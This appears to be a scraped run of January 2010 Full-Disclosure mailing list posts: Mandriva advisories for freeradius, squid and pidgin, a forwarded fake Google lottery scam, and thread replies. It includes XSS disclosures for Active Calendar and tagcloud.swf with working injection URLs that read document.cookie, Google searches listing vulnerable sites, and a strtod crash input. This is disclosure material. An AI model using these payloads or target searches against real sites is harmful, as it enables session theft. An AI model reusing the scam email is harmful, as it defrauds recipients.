-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:227-1 http://www.mandriva.com/security/ ___ Package : freeradius Date: January 11, 2010 Affected: 2008.0 ___ Problem Description: A vulnerability has been found and corrected in freeradius: The rad_decode function in FreeRADIUS before 1.1.8 allows remote attackers to cause a denial of service (radiusd crash) via zero-length Tunnel-Password attributes. NOTE: this is a regression error related to CVE-2003-0967 (CVE-2009-3111). This update provides a solution to this vulnerability. Update: Packages for 2008.0 are provided for Corporate Desktop 2008.0 customers. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3111 ___ Updated Packages: Mandriva Linux 2008.0: 5db7c7125fc6b64c4e19b41743a3d391 2008.0/i586/freeradius-1.1.7-2.1mdv2008.0.i586.rpm d59025aad5710dcf003b8edfe695848c 2008.0/i586/libfreeradius1-1.1.7-2.1mdv2008.0.i586.rpm 02aa3c297749e91957e097e9de134ce7 2008.0/i586/libfreeradius1-devel-1.1.7-2.1mdv2008.0.i586.rpm ddaa5a7e121c621798cf0358a245c5ce 2008.0/i586/libfreeradius1-krb5-1.1.7-2.1mdv2008.0.i586.rpm 1f0ea64c0787b93c42fb29fbd615baad 2008.0/i586/libfreeradius1-ldap-1.1.7-2.1mdv2008.0.i586.rpm c4f227f1f8f935148c0c7aeba688d3df 2008.0/i586/libfreeradius1-mysql-1.1.7-2.1mdv2008.0.i586.rpm 8f5eb11bfcf411b1854cec739a17e496 2008.0/i586/libfreeradius1-postgresql-1.1.7-2.1mdv2008.0.i586.rpm f44080d2bd42733cc640992d70f94399 2008.0/i586/libfreeradius1-unixODBC-1.1.7-2.1mdv2008.0.i586.rpm 088a48c14b01451f7799c2a0b3820f70 2008.0/SRPMS/freeradius-1.1.7-2.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: d26be209e79a0da439d3489108650ea2 2008.0/x86_64/freeradius-1.1.7-2.1mdv2008.0.x86_64.rpm 082f9155c2f093e74c2186e708bebbe6 2008.0/x86_64/lib64freeradius1-1.1.7-2.1mdv2008.0.x86_64.rpm 4e3053bd6265f37ba4527c9738624473 2008.0/x86_64/lib64freeradius1-devel-1.1.7-2.1mdv2008.0.x86_64.rpm bc25d9c5adc3f7ce432fa20160616e45 2008.0/x86_64/lib64freeradius1-krb5-1.1.7-2.1mdv2008.0.x86_64.rpm 268827f99ffd55741d727725fc6236fd 2008.0/x86_64/lib64freeradius1-ldap-1.1.7-2.1mdv2008.0.x86_64.rpm 84f2e95d7c341e593d437cae273bf340 2008.0/x86_64/lib64freeradius1-mysql-1.1.7-2.1mdv2008.0.x86_64.rpm d3ea3f4db30aefbb571714904fa5f4fb 2008.0/x86_64/lib64freeradius1-postgresql-1.1.7-2.1mdv2008.0.x86_64.rpm a7a6e27406a4ec0bcdfc9a1399e21719 2008.0/x86_64/lib64freeradius1-unixODBC-1.1.7-2.1mdv2008.0.x86_64.rpm 088a48c14b01451f7799c2a0b3820f70 2008.0/SRPMS/freeradius-1.1.7-2.1mdv2008.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLSz96mqjQ0CJFipgRAhn1AKDrpsYazirmVWdmk9e2QVlhT/I23ACgnuZF tXu2ME6yDlg4jrTPfZ0jz5Q= =b2h3 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Fwd: CONGRATULATION GOOGLE 11th ANNIVERSARY
Speaking of spam, please find attached a SPAM message I received as of late. It shows an example of the latest spam attacks, with a touch of ingenuity. However, I believe lots need to be done to make it more credible, including perhaps passing the message through a spell check first. Maybe we could expect this in some years' time, with perhaps stealthy contact/payback details. Of interest is the given return email address, googllefundsreleasepaym...@gmail.com (notice the double l). Just my 2 cents. Regards, Christian Sciberras -- Forwarded message -- From: GOOGLE 11th ANNIVERSARY rinaldipere...@gmail.com Date: 2010/1/11 Subject: CONGRATULATION GOOGLE 11th ANNIVERSARY To: GOOGLE SEARCH CORPORATION: CUSTOMER SERVICE TARAGONA ESPANA. ADDRESS: C/LESTANY,PARC.2,43006 TARRAGONA-SPAIN GOOGLE SEARCH ADVERTISING: FAX...O34372511348 TEL...034-672-511-349 GOOGLE 11th ANNIVERSARY This is to notify all online customers that Google is 11th years; Google became a Corporation on September 27,1998. This Corporation was established to encourage individual that are active Users of Google search engine and Google ancillary service.Google is currently the world leading search engine worldwide, and is vigorously making more effort to make sure the reputation of the company stands out to be the best among the rest, with the optimize help of our customers worldwide. We wish to congratulate you once again,for being selected on the ongoing 11th Anniversary. .. Google Corporation highly believe that with your prize, you will always be active and also A total sum of 460,000, 00{Four Hundred and Sixty Thousand European Euro} have been issued out by Google Corporation. A winning cheque will be issued in your name and also a certificate of prize claim will be sent along side with your winning cheque. You are advised to contact your Foreign Transfer Manager with the following details Below to avoid unnecessary delay and complications. VERIFICATION AND FUNDS RELEASE FORM. (1) Your contact address. (2) Your Tel/Fax numbers. (3) Your International passport / country (4) Your Full Names. (5) Occupation/Age. (6) How do you feel as one of the Winners: Foreign Transfer Manager Mr. Basorun Fizz Google Corporations? Tel... 034-672-511-349 EMAIL: googllefundsreleasepaym...@gmail.com Note: This is an New Year giveaway for 2010 and also our Anniversary for 2009 section Only.Congratulations from the Staffs Members of the Google Board Commission. 2010 Google Corporation. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Nginx, Varnish, Cherokee, thttpd, mini-httpd, WEBrick, Orion, AOLserver, Yaws and Boa log escape sequence injection
*spelt On Sun, Jan 10, 2010 at 9:21 PM, Jef Poskanzer j...@mail.acme.com wrote: It's spelled synergy. --- Jef Jef Poskanzer j...@mail.acme.com http://acme.com/jef/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Surge in Skype Spam activity
Or you can also use: http://sucuri.net/?page=toolstitle=check-url Which checks any short URL and also run them through site advisor and google safe browsing to see what they think of it... --dd On Mon, Jan 11, 2010 at 2:08 PM, Thor (Hammer of God) t...@hammerofgod.com wrote: http://kiserai.net/turl.pl Tiny URL decoder. I was going to send the TinyURL decoder in a TinyURL, but I’m just not that motivated atm. J t From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Larry Seltzer Sent: Monday, January 11, 2010 5:44 AM To: dramacrat; Chen Levkovich Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Surge in Skype Spam activity It’s harmless, he’s just blowing his own company’s horn. Speaking of spam… h, shall I click a tinyurl coming from a f-d poster? n/n, pick one this is email, not twitter. if you're sharing a legitimate link, there's no reason not to directly link to it. 2010/1/11 Chen Levkovich chen.levkov...@securityextension.com Surge in Skype Spam activity. http://tinyurl.com/yc38trm ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] XSS Vulnerability in Active Calendar 1.2.0
XSS Vulnerability in Active Calendar 1.2.0 Discovered by Martin Barbella martybarbe...@gmail.com Description of Vulnerability: - Active Calendar is PHP Class, that generates calendars (year, month or week view) as a HTML Table (XHTML-Valid). (From: http://micronetwork.de/activecalendar/index.php) In the functions enableYearNav, enableMonthNav, enableDayLinks, and enableDatePicker of the activeCalendar class, certain variables are assigned the value of $_SERVER['PHP_SELF'] when either no value is specified for $link, or the value of $link is false. The values of these variables are not sanitized later, resulting in several cross site scripting vulnerabilities. Systems affected: - This has been confirmed in version 1.2.0 of Active Calendar. Previous versions may also be affected. Impact: --- When a user is tricked into clicking on a malicious link or submitting a specially crafted form, the injected code travels to the vulnerable web server, which reflects the attack back to the user's browser. The browser then executes the code because it came from a trusted server. (From OWASP: http://www.owasp.org/index.php/Cross-site_Scripting_%28XSS%29) Mitigating factors: --- The vulnerabilities will only affect applications which call the four functions above with the default values, or applications which call the above functions with false passed as the value of the $link parameter. Proof of concept: - The code segment shows a basic example of how Active Calendar could be used with a call to one of the four vulnerable functions. ?php require_once(activecalendar.php); $cal = new activeCalendar(); $cal-enableDayLinks(); ? ?php print ?xml version=\1.0\ encoding=\UTF-8\?\n; ? !DOCTYPE html PUBLIC -//W3C//DTD XHTML 1.0 Transitional//EN http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd; html head titleActive Calendar XSS Example/title /head body center ?php print $cal-showYear(); ? /center /body /html If this script was located at http://site/test.php, the vulnerability could be demonstrated by viewing http://site/test.php/;scriptdocument.body.innerHTML='XSS';/script. Workaround: --- When using the activeCalendar class, explicitly pass a sanitized value for the $link parameter when calling the functions enableYearNav, enableMonthNav, enableDayLinks, and enableDatePicker. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Nginx, Varnish, Cherokee, thttpd, mini-httpd, WEBrick, Orion, AOLserver, Yaws and Boa log escape sequence injection
Or spelled. http://dictionary.reference.com/browse/spelled --On Monday, January 11, 2010 12:46:29 -0600 Benji m...@b3nji.com wrote: *spelt On Sun, Jan 10, 2010 at 9:21 PM, Jef Poskanzer j...@mail.acme.com wrote: It's spelled synergy. --- Jef Jef Poskanzer ...@mail.acme.com http://acme.com/jef/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Paul Schmehl, Senior Infosec Analyst As if it wasn't already obvious, my opinions are my own and not those of my employer. *** It is as useless to argue with those who have renounced the use of reason as to administer medication to the dead. Thomas Jefferson ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2009:241-1 ] squid
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:241-1 http://www.mandriva.com/security/ ___ Package : squid Date: January 11, 2010 Affected: 2008.0 ___ Problem Description: A vulnerability was discovered and corrected in squid: The strListGetItem function in src/HttpHeaderTools.c in Squid 2.7 allows remote attackers to cause a denial of service via a crafted auth header with certain comma delimiters that trigger an infinite loop of calls to the strcspn function (CVE-2009-2855). This update provides a solution to this vulnerability. Update: Packages for 2008.0 are provided for Corporate Desktop 2008.0 customers. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2855 ___ Updated Packages: Mandriva Linux 2008.0: e4c9373aabe23a99038535933cadfcdf 2008.0/i586/squid-2.6.STABLE16-1.4mdv2008.0.i586.rpm 264a75acfe38304d56f246ced43c0b77 2008.0/i586/squid-cachemgr-2.6.STABLE16-1.4mdv2008.0.i586.rpm c5cb0059c20cf425ae1eb5320fb88d9a 2008.0/SRPMS/squid-2.6.STABLE16-1.4mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 736aebebdae4217c764a3a27d352f162 2008.0/x86_64/squid-2.6.STABLE16-1.4mdv2008.0.x86_64.rpm bac27002220cdbe610a1dc5cfb249603 2008.0/x86_64/squid-cachemgr-2.6.STABLE16-1.4mdv2008.0.x86_64.rpm c5cb0059c20cf425ae1eb5320fb88d9a 2008.0/SRPMS/squid-2.6.STABLE16-1.4mdv2008.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (GNU/Linux) iD8DBQFLS16KmqjQ0CJFipgRAtkWAJ41RYElygKvE+mNiEahH9mrolMmSgCfc+LZ PPkZg8mJLqu1BaIf56PCYiU= =E+fE -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] TSA Logo Contest - Schneier
http://www.schneier.com/blog/archives/2010/01/tsa_logo_contes.html ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Surge in Skype Spam activity
On 1/11/2010 3:26 AM, Chen Levkovich wrote: Surge in Skype Spam activity.http://tinyurl.com/yc38trm http://tinyurl.com/yc38trm If only your site actually said anything about the spam... Like what kind of viruses the software they're pedaling is infected with or something. Useless post is useless. -J -- It is no measure of health to be well adjusted to a profoundly sick society. -Krishnamurti +---+ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] XSS vulnerabilities in 34 millions flash files
Yo MustDie, Post your shit here: http://www.exploit-db.com/ They love XSS. 2010/1/11 MustLive mustl...@websecurity.com.ua Hello Full-Disclosure! Yesterday I wrote the article XSS vulnerabilities in 34 millions flash files (http://websecurity.com.ua/3842/), and here is English version of it. In December in my article XSS vulnerabilities in 8 millions flash files (http://websecurity.com.ua/3789/) I wrote, that there are up to 3400 of flashes tagcloud.swf in Internet which are potentially vulnerable to XSS attacks. Taking into account that people mostly didn't draw attention in previous article to my mentioning about another 34 millions of vulnerable flashes, then I decided to write another article about it. File tagcloud.swf was developed by author of plugin WP-Cumulus for WordPress (http://websecurity.com.ua/3665/) and it's delivered with this plugin for WordPress, and also with other plugins, particularly Joomulus (http://websecurity.com.ua/3801/) and JVClouds3D (http://websecurity.com.ua/3839/) for Joomla and Blogumus (http://websecurity.com.ua/3843/) for Blogger. Taking into account prevalence of this flash file, I'll note that it's most widespread flash file in Internet with XSS vulnerability. - Prevalence of the problem. - There are a lot of vulnerable tagcloud.swf files in Internet (according to Google): http://www.google.com.ua/search?q=filetype:swf+inurl:tagcloud.swf If at 18.12.2009 there were about 3400 results, then now there are about 3250 results. And these are only those flash files, which were indexed by Google, and actually there can be much more of them. So there are about 32,5 millions of sites with file tagcloud.swf which are vulnerable to XSS and HTML Injection attacks. Among them there are about 273000 gov-sites ( http://www.google.com.ua/search?q=filetype:swf+inurl:tagcloud.swf+inurl:govfilter=0 ) which are vulnerable to XSS and HTML Injection attacks. -- Vulnerabilities in swf-file. -- File tagcloud.swf is vulnerable to XSS and HTML Injection attacks via parameter tagcloud. XSS: http://site/tagcloud.swf?mode=tagstagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3Ehttp://site/tagcloud.swf?mode=tagstagcloud=%3Ctags%3E%3Ca+href=%27javascript:alert%28document.cookie%29%27+style=%27font-size:+40pt%27%3EClick%20me%3C/a%3E%3C/tags%3E Code will execute after click. It's strictly social XSS. HTML Injection: http://site/tagcloud.swf?mode=tagstagcloud=%3Ctags%3E%3Ca+href='http://websecurity.com.ua'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3Ehttp://site/tagcloud.swf?mode=tagstagcloud=%3Ctags%3E%3Ca+href=%27http://websecurity.com.ua%27+style=%27font-size:+40pt%27%3EClick%20me%3C/a%3E%3C/tags%3E HTML Injection attack can be conducted particularly on those flash files which have protection (in flash files or via WAF) against javascript and vbscript URI in parameter tagcloud. Examples of vulnerable sites. I gave examples of vulnerable sites with this swf-file in post XSS vulnerabilities in tagcloud.swf at gov and gov.ua (http://websecurity.com.ua/3835/). So for flash developers it's better to attend to security of their flash files. And for owners of sites with vulnerable flashes (particularly tagcloud.swf) it's needed either to fix them by themselves, or to turn to their developers. Best wishes regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2010:001 ] pidgin
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2010:001 http://www.mandriva.com/security/ ___ Package : pidgin Date: January 11, 2010 Affected: 2008.0, 2009.1, Enterprise Server 5.0 ___ Problem Description: Security vulnerabilities has been identified and fixed in pidgin: The OSCAR protocol plugin in libpurple in Pidgin before 2.6.3 and Adium before 1.3.7 allows remote attackers to cause a denial of service (application crash) via crafted contact-list data for (1) ICQ and possibly (2) AIM, as demonstrated by the SIM IM client (CVE-2009-3615). Directory traversal vulnerability in slp.c in the MSN protocol plugin in libpurple in Pidgin 2.6.4 and Adium 1.3.8 allows remote attackers to read arbitrary files via a .. (dot dot) in an application/x-msnmsgrp2p MSN emoticon (aka custom smiley) request, a related issue to CVE-2004-0122. NOTE: it could be argued that this is resultant from a vulnerability in which an emoticon download request is processed even without a preceding text/x-mms-emoticon message that announced availability of the emoticon (CVE-2010-0013). Packages for 2008.0 are provided for Corporate Desktop 2008.0 customers. This update provides pidgin 2.6.5, which is not vulnerable to these issues. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3615 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0013 http://pidgin.im/news/security/ ___ Updated Packages: Mandriva Linux 2008.0: 2c06bb10b976371e7300df80f21c9533 2008.0/i586/finch-2.6.5-0.1mdv2008.0.i586.rpm eec4d32bc466fe61620058eef2811c59 2008.0/i586/libfinch0-2.6.5-0.1mdv2008.0.i586.rpm c2e83523eef01b27c13030674f1821a6 2008.0/i586/libpurple0-2.6.5-0.1mdv2008.0.i586.rpm c048d2e19a00b62bc0c191ebd5fa0be6 2008.0/i586/libpurple-devel-2.6.5-0.1mdv2008.0.i586.rpm dfad05993ac7cf897035fa9f89cb356f 2008.0/i586/pidgin-2.6.5-0.1mdv2008.0.i586.rpm 4f8f5bbdaa24841787dc908bbd69b6c2 2008.0/i586/pidgin-bonjour-2.6.5-0.1mdv2008.0.i586.rpm 9069609e14ecedac948eada332204cba 2008.0/i586/pidgin-client-2.6.5-0.1mdv2008.0.i586.rpm f4bba9135a059cc4e17cef81e4e67f4c 2008.0/i586/pidgin-gevolution-2.6.5-0.1mdv2008.0.i586.rpm ac1fb16b6cb7aee737c8257cc08d10fd 2008.0/i586/pidgin-i18n-2.6.5-0.1mdv2008.0.i586.rpm 4d27f7e644d0a046bfaaa9f8e2730b1b 2008.0/i586/pidgin-meanwhile-2.6.5-0.1mdv2008.0.i586.rpm ae1a27acc73fb0afdfcef69000164fff 2008.0/i586/pidgin-mono-2.6.5-0.1mdv2008.0.i586.rpm d9e9cc8eea7b6d610c259387e1c0d793 2008.0/i586/pidgin-perl-2.6.5-0.1mdv2008.0.i586.rpm 1439d48d97f903914d4d1bce8c1b7a20 2008.0/i586/pidgin-plugins-2.6.5-0.1mdv2008.0.i586.rpm 8cae43bfd645f923ba49f6ec2e09f6ad 2008.0/i586/pidgin-silc-2.6.5-0.1mdv2008.0.i586.rpm 096a02afcc29a8d1baa34a670e2de632 2008.0/i586/pidgin-tcl-2.6.5-0.1mdv2008.0.i586.rpm 5aac126cfe57e39c1b4eba9e2152d0be 2008.0/SRPMS/pidgin-2.6.5-0.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 734f3c61defb540185b139769bab2d85 2008.0/x86_64/finch-2.6.5-0.1mdv2008.0.x86_64.rpm 2592d99b6a0dc93e761cf204d8669f3f 2008.0/x86_64/lib64finch0-2.6.5-0.1mdv2008.0.x86_64.rpm 2df77ea5193e8e235fe56ba020a9c411 2008.0/x86_64/lib64purple0-2.6.5-0.1mdv2008.0.x86_64.rpm 07476c00358bf692c911507376c1c61f 2008.0/x86_64/lib64purple-devel-2.6.5-0.1mdv2008.0.x86_64.rpm 71f2517d99316e3f31963941d9c36c06 2008.0/x86_64/pidgin-2.6.5-0.1mdv2008.0.x86_64.rpm bd1217b2dc4587cfd38e0b8b2781bde7 2008.0/x86_64/pidgin-bonjour-2.6.5-0.1mdv2008.0.x86_64.rpm 5b2ef2c3a2f84c241f43f151d6713f37 2008.0/x86_64/pidgin-client-2.6.5-0.1mdv2008.0.x86_64.rpm ec0e2975982a45eee3e37ecf07c356b5 2008.0/x86_64/pidgin-gevolution-2.6.5-0.1mdv2008.0.x86_64.rpm d724e5fde2c4495883463a1d508e87c8 2008.0/x86_64/pidgin-i18n-2.6.5-0.1mdv2008.0.x86_64.rpm 8d2c6a64e63d24a2da8a130b967f048a 2008.0/x86_64/pidgin-meanwhile-2.6.5-0.1mdv2008.0.x86_64.rpm 2aa347dceb072b18bbd6e2665c19b7b5 2008.0/x86_64/pidgin-mono-2.6.5-0.1mdv2008.0.x86_64.rpm aa0c7bc1e0909f2a1c0a3a890e590263 2008.0/x86_64/pidgin-perl-2.6.5-0.1mdv2008.0.x86_64.rpm f3c4f803f7d765da7dddc900fc2a8272 2008.0/x86_64/pidgin-plugins-2.6.5-0.1mdv2008.0.x86_64.rpm 9bacb42d819da7afa3ddc5cac0efb367 2008.0/x86_64/pidgin-silc-2.6.5-0.1mdv2008.0.x86_64.rpm 9caaf8618d807e9fd894cd4786a5792d 2008.0/x86_64/pidgin-tcl-2.6.5-0.1mdv2008.0.x86_64.rpm 5aac126cfe57e39c1b4eba9e2152d0be 2008.0/SRPMS/pidgin-2.6.5-0.1mdv2008.0.src.rpm Mandriva Linux 2009.1: 269680b8627e14ab28ad538ec1794fc6 2009.1/i586/finch-2.6.5-0.1mdv2009.1.i586.rpm 3e8698694d5815efdb7087c83d798c91
[Full-disclosure] [ MDVSA-2010:002 ] pidgin
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2010:002 http://www.mandriva.com/security/ ___ Package : pidgin Date: January 11, 2010 Affected: 2010.0 ___ Problem Description: A security vulnerability has been identified and fixed in pidgin: Directory traversal vulnerability in slp.c in the MSN protocol plugin in libpurple in Pidgin 2.6.4 and Adium 1.3.8 allows remote attackers to read arbitrary files via a .. (dot dot) in an application/x-msnmsgrp2p MSN emoticon (aka custom smiley) request, a related issue to CVE-2004-0122. NOTE: it could be argued that this is resultant from a vulnerability in which an emoticon download request is processed even without a preceding text/x-mms-emoticon message that announced availability of the emoticon (CVE-2010-0013). This update provides pidgin 2.6.5, which is not vulnerable to this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0013 http://pidgin.im/news/security/ ___ Updated Packages: Mandriva Linux 2010.0: 0b141dc591a1677affc824e714c0bfa5 2010.0/i586/finch-2.6.5-0.1mdv2010.0.i586.rpm 3d851548d89644efdfb701ba90c468da 2010.0/i586/libfinch0-2.6.5-0.1mdv2010.0.i586.rpm 91a4b9783856ae2565c2cd3a9b27ebb6 2010.0/i586/libpurple0-2.6.5-0.1mdv2010.0.i586.rpm a0c9e1a42b96b117822968b581869513 2010.0/i586/libpurple-devel-2.6.5-0.1mdv2010.0.i586.rpm ec2f185f4aaf4a83fdd95d1ee5023c4c 2010.0/i586/pidgin-2.6.5-0.1mdv2010.0.i586.rpm aefdd5492a98e1823ba0c7286b3558b9 2010.0/i586/pidgin-bonjour-2.6.5-0.1mdv2010.0.i586.rpm 92599926774c68178a399e8e6b680029 2010.0/i586/pidgin-client-2.6.5-0.1mdv2010.0.i586.rpm 1d213714f4d9da85fd0bac7e793aa0d5 2010.0/i586/pidgin-gevolution-2.6.5-0.1mdv2010.0.i586.rpm a1e458dcd2c10987934208d9a18cd2b5 2010.0/i586/pidgin-i18n-2.6.5-0.1mdv2010.0.i586.rpm afc26ed9b344e3d4317fd7e32b88fa88 2010.0/i586/pidgin-meanwhile-2.6.5-0.1mdv2010.0.i586.rpm 3233cfec46020dbff5ef6f6fa4a4025e 2010.0/i586/pidgin-mono-2.6.5-0.1mdv2010.0.i586.rpm 48a5641b1104620aba0e2cbfa65a101f 2010.0/i586/pidgin-perl-2.6.5-0.1mdv2010.0.i586.rpm 44461abfbd8bc983a1e440a331ddc823 2010.0/i586/pidgin-plugins-2.6.5-0.1mdv2010.0.i586.rpm 80e0cedd0d60fe626dc5253db502e1bd 2010.0/i586/pidgin-silc-2.6.5-0.1mdv2010.0.i586.rpm 531a6537d9bf005ee54aece14aa48eb6 2010.0/i586/pidgin-tcl-2.6.5-0.1mdv2010.0.i586.rpm 83d0f2b5bb31e313c53c4d40ca8fe1da 2010.0/SRPMS/pidgin-2.6.5-0.1mdv2010.0.src.rpm Mandriva Linux 2010.0/X86_64: e27d2817c814cf90bad7e205081402a2 2010.0/x86_64/finch-2.6.5-0.1mdv2010.0.x86_64.rpm 611f230ca512ad0db64acc14ef06e148 2010.0/x86_64/lib64finch0-2.6.5-0.1mdv2010.0.x86_64.rpm 8ae845e339ca97ebdd7f302eac3e5899 2010.0/x86_64/lib64purple0-2.6.5-0.1mdv2010.0.x86_64.rpm 525a83c8cb39f1b8a5c54d1ee91d5e49 2010.0/x86_64/lib64purple-devel-2.6.5-0.1mdv2010.0.x86_64.rpm 2ef31af24eb8a4c2706e67f941ad9fa3 2010.0/x86_64/pidgin-2.6.5-0.1mdv2010.0.x86_64.rpm f8d2d37e7e9f070ec94339c2a3b6b8f0 2010.0/x86_64/pidgin-bonjour-2.6.5-0.1mdv2010.0.x86_64.rpm 45038a16defd0813f381fea1b184697a 2010.0/x86_64/pidgin-client-2.6.5-0.1mdv2010.0.x86_64.rpm 9f48d1a4af0d24195610a0392f721acb 2010.0/x86_64/pidgin-gevolution-2.6.5-0.1mdv2010.0.x86_64.rpm 6c7d1fcb4f0ba1a1b32d04ecaf51ce59 2010.0/x86_64/pidgin-i18n-2.6.5-0.1mdv2010.0.x86_64.rpm 7efbc4ca6f8028476e6a842238d5e19c 2010.0/x86_64/pidgin-meanwhile-2.6.5-0.1mdv2010.0.x86_64.rpm 58f135d340961f21b7b7a37931c7bf1d 2010.0/x86_64/pidgin-mono-2.6.5-0.1mdv2010.0.x86_64.rpm 798c84ae196fdedbeddb8d71374ce063 2010.0/x86_64/pidgin-perl-2.6.5-0.1mdv2010.0.x86_64.rpm 507b908bb81dc61cd633fccea1023314 2010.0/x86_64/pidgin-plugins-2.6.5-0.1mdv2010.0.x86_64.rpm 48518b319bc1c5a5a452be9ceb522763 2010.0/x86_64/pidgin-silc-2.6.5-0.1mdv2010.0.x86_64.rpm b38b6ee90af7cee2298ba8f191b7fcc6 2010.0/x86_64/pidgin-tcl-2.6.5-0.1mdv2010.0.x86_64.rpm 83d0f2b5bb31e313c53c4d40ca8fe1da 2010.0/SRPMS/pidgin-2.6.5-0.1mdv2010.0.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com
Re: [Full-disclosure] MacOS X 10.5/10.6 libc/strtod(3) buffer overflow
Joshua Levitsky wrote: On Thu, Jan 7, 2010 at 7:20 PM, Maksymilian Arciemowicz c...@securityreason.com mailto:c...@securityreason.com wrote: [ MacOS X 10.5/10.6 libc/strtod(3) buffer overflow ] Author: Maksymilian Arciemowicz and sp3x http://SecurityReason.com CVE: CVE-2009-0689 CWE: CWE-119 Risk: High Remote: Yes I tested doing printf %1.262159f 1.1 in a shell login on 10.4.11 and it took out my session. I imagine this means 10.4.11 is vulnerable as well no? Tiger is still very popular in enterprise environments that are slow to upgrade. -- Joshua Levitsky, MCSE, CISSP http://www.jnuxhosting.net http://www.jnux.net http://blog.joshie.com/ [5957 F27C 9C71 E9A7 274A 0447 C9B9 75A4 9B41 D4D1] Could you check perl PoC ? It should overwrite esi and edi register esi=0x41414141 edi=15 -- Best Regards, pub 1024D/A6986BD6 2008-08-22 uid Maksymilian Arciemowicz (cxib) c...@securityreason.com sub 4096g/0889FA9A 2008-08-22 http://securityreason.com http://securityreason.com/key/Arciemowicz.Maksymilian.gpg signature.asc Description: OpenPGP digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] HITB Ezine 'Reloaded' - Issue #001
